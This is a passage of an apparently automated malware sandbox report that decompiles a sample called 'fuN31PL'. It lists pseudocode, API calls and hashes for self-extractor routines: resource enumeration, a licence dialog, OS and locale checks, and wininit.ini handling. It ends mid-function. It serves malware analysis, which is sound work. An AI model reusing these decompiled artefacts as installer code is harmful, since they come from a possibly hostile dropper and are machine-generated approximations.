                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2212493051-0
                                                                                                                                                                                                                                              • Opcode ID: 5d133f08e6af1cc8e38769aca5f987d56eae32beb9a8488db72c2f6fa0f28a88
                                                                                                                                                                                                                                              • Instruction ID: bb4c9fa2719f0e1cf32e1cd24f36de0b827b62c7f7567965babc8cccc1aa8ba8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d133f08e6af1cc8e38769aca5f987d56eae32beb9a8488db72c2f6fa0f28a88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF311776A00119ABCB14CFB8DD899EEBBB9EF8A310F554169F805B3250DB70AD45CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                                              			E001A6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				struct HRSRC__* _t21;
                                                                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                              				_t46 = 0;
                                                                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                                                                              				_t36 = 1;
                                                                                                                                                                                                                                              				E001A171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              						_t36 = _t46;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                              						_t44 = _t5;
                                                                                                                                                                                                                                              						_t40 = _t44;
                                                                                                                                                                                                                                              						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                              						_t47 = _t6;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t26 =  *_t40;
                                                                                                                                                                                                                                              							_t40 = _t40 + 1;
                                                                                                                                                                                                                                              						} while (_t26 != 0);
                                                                                                                                                                                                                                              						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                              						_t46 = _t51;
                                                                                                                                                                                                                                              						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                              						 *0x1aa288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                              						_t30 = _v32();
                                                                                                                                                                                                                                              						if(_t51 != _t51) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(_t45);
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							_t36 = 0;
                                                                                                                                                                                                                                              							FreeResource(??);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							FreeResource();
                                                                                                                                                                                                                                              							_v36 = _v36 + 1;
                                                                                                                                                                                                                                              							E001A171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                              							_t46 = 0;
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					return E001A6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}
                                                                                                                                                                                                                                              0x001a6302
                                                                                                                                                                                                                                              0x001a6308
                                                                                                                                                                                                                                              0x001a630d
                                                                                                                                                                                                                                              0x001a6314
                                                                                                                                                                                                                                              0x001a6314
                                                                                                                                                                                                                                              0x001a6316
                                                                                                                                                                                                                                              0x001a6319
                                                                                                                                                                                                                                              0x001a6355
                                                                                                                                                                                                                                              0x001a6357
                                                                                                                                                                                                                                              0x001a631b
                                                                                                                                                                                                                                              0x001a631b
                                                                                                                                                                                                                                              0x001a6331
                                                                                                                                                                                                                                              0x001a6334
                                                                                                                                                                                                                                              0x001a6339
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6339
                                                                                                                                                                                                                                              0x001a6319
                                                                                                                                                                                                                                              0x001a636b
                                                                                                                                                                                                                                              0x001a637d
                                                                                                                                                                                                                                              0x001a637d
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A171E: _vsnprintf.MSVCRT ref: 001A1750
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A62CD
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A62D4
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A631B
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 001A6345
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A6357
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                              • String ID: UPDFILE%lu
                                                                                                                                                                                                                                              • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                              • Opcode ID: 37c161033ad5766c3c53bd76b999739cb9fa37dffecf09e9d31bb953ac9124cf
                                                                                                                                                                                                                                              • Instruction ID: 617162264e68de2ed4f92d4799d13ee7d2f5a21457c9bc24f739aa0ecd7a7567
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37c161033ad5766c3c53bd76b999739cb9fa37dffecf09e9d31bb953ac9124cf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B21E1B9A00219ABDB149FA4CC459BFBB78FF4A710B040129FA06A3641DB359D46CBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A681F(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                              				void* _v172;
                                                                                                                                                                                                                                              				int* _v176;
                                                                                                                                                                                                                                              				int _v180;
                                                                                                                                                                                                                                              				int _v184;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                                                                                                              				_t19 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                              				_t41 =  *0x1a81d8; // 0x0
                                                                                                                                                                                                                                              				_t43 = 0;
                                                                                                                                                                                                                                              				_v180 = 0xc;
                                                                                                                                                                                                                                              				_v176 = 0;
                                                                                                                                                                                                                                              				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                              					 *0x1a81d8 = 0;
                                                                                                                                                                                                                                              					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              						_t41 =  *0x1a81d8; // 0x0
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t41 = 1;
                                                                                                                                                                                                                                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t31 = RegQueryValueExA(_v172, 0x1a1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                              							_t43 = _t31;
                                                                                                                                                                                                                                              							RegCloseKey(_v172);
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t40 =  &_v176;
                                                                                                                                                                                                                                              								if(E001A66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                              									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                              										 *0x1a81d8 = _t41;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L12;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001A686E
                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 001A68A7
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001A68CC
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,?,0000000C), ref: 001A68F4
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 001A6902
                                                                                                                                                                                                                                                • Part of subcall function 001A66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,001A691A), ref: 001A6741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 001A68C2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                              • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                              • Opcode ID: 3aa8c31af848cd07cf2404bcf3166e2b83a11a7ce17461de85343723f50ba275
                                                                                                                                                                                                                                              • Instruction ID: d8d2996a3d6715625ec1b653f57d19332743d30573e36107e801546aac5f8cf6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3aa8c31af848cd07cf2404bcf3166e2b83a11a7ce17461de85343723f50ba275
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93315E79A002189FDB219F11CC45BABB7B8EF47768F0801A9E949A2140DB309E89CF52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A3A3F(void* __eflags) {
                                                                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = "LICENSE";
                                                                                                                                                                                                                                              				_t1 = E001A468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				 *0x1a8d4c = _t3;
                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                              					_t19 = _t16;
                                                                                                                                                                                                                                              					if(E001A468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA( *0x1a8d4c, "<None>") == 0) {
                                                                                                                                                                                                                                              							LocalFree( *0x1a8d4c);
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t9 = E001A6517(_t19, 0x7d1, 0, E001A3100, 0, 0);
                                                                                                                                                                                                                                              						LocalFree( *0x1a8d4c);
                                                                                                                                                                                                                                              						if(_t9 != 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x800704c7;
                                                                                                                                                                                                                                              						L2:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree( *0x1a8d4c);
                                                                                                                                                                                                                                              					 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001A2F64,?,00000002,00000000), ref: 001A3A5D
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 001A3AB3
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 001A3AD0
                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 001A3B13
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FindResourceA.KERNEL32(001A0000,000007D6,00000005), ref: 001A652A
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: LoadResource.KERNEL32(001A0000,00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001A6538
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: DialogBoxIndirectParamA.USER32(001A0000,00000000,00000547,001A19E0,00000000), ref: 001A6557
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FreeResource.KERNEL32(00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001A6560
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,001A3100,00000000,00000000), ref: 001A3AF4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$LICENSE
                                                                                                                                                                                                                                              • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                              • Opcode ID: 49eb9fae2f8a20c78201c15e0fa1d7153af83ecaeb790c8234b6828cc8e559e3
                                                                                                                                                                                                                                              • Instruction ID: 717a7530d70b481f7756386c40582f675005acb91dd70caad5f6071c059a4c68
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49eb9fae2f8a20c78201c15e0fa1d7153af83ecaeb790c8234b6828cc8e559e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E110878300201BBD725AF76AD09F277ABAEFDB710F10413EB546D69A1DBB98840C660
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A24E0(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t7;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = __ebx;
                                                                                                                                                                                                                                              				_t7 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                              				_t25 = 0x104;
                                                                                                                                                                                                                                              				_t26 = 0;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					E001A658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                              					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                              					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                              						_lclose(_t25);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 001A2506
                                                                                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 001A252C
                                                                                                                                                                                                                                              • _lopen.KERNEL32 ref: 001A253B
                                                                                                                                                                                                                                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 001A254C
                                                                                                                                                                                                                                              • _lclose.KERNEL32(00000000), ref: 001A2555
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                              • String ID: wininit.ini
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E001A36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                              				signed int _v420;
                                                                                                                                                                                                                                              				signed int _v424;
                                                                                                                                                                                                                                              				CHAR* _v428;
                                                                                                                                                                                                                                              				CHAR* _v432;
                                                                                                                                                                                                                                              				signed int _v436;
                                                                                                                                                                                                                                              				CHAR* _v440;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                                                                              				CHAR* _t77;
                                                                                                                                                                                                                                              				CHAR* _t91;
                                                                                                                                                                                                                                              				CHAR* _t94;
                                                                                                                                                                                                                                              				int _t97;
                                                                                                                                                                                                                                              				CHAR* _t98;
                                                                                                                                                                                                                                              				signed char _t99;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				signed short _t107;
                                                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                                                              				short _t113;
                                                                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                                                                              				signed char _t115;
                                                                                                                                                                                                                                              				short _t119;
                                                                                                                                                                                                                                              				CHAR* _t123;
                                                                                                                                                                                                                                              				CHAR* _t124;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				signed int _t131;
                                                                                                                                                                                                                                              				signed int _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				CHAR* _t138;
                                                                                                                                                                                                                                              				signed int _t139;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t72 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                              				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              				_t115 = __ecx;
                                                                                                                                                                                                                                              				_t135 = 0;
                                                                                                                                                                                                                                              				_v432 = __ecx;
                                                                                                                                                                                                                                              				_t138 = 0;
                                                                                                                                                                                                                                              				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                              					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                              					_t119 = 2;
                                                                                                                                                                                                                                              					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                              					__eflags = _t77;
                                                                                                                                                                                                                                              					if(_t77 == 0) {
                                                                                                                                                                                                                                              						_t119 = 0;
                                                                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                                                                              						 *0x1a8184 = 1;
                                                                                                                                                                                                                                              						 *0x1a8180 = 1;
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						 *0x1a9a40 = _t119;
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						__eflags =  *0x1a8a34 - _t138; // 0x0
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                                                              						if(_t115 == 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v428 = _t135;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                              						_t11 =  &_v420;
                                                                                                                                                                                                                                              						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                              						__eflags =  *_t11;
                                                                                                                                                                                                                                              						_v440 = _t115;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                              							_v436 = E001A2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                              							_t91 = E001A2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                              							_t123 = _v436;
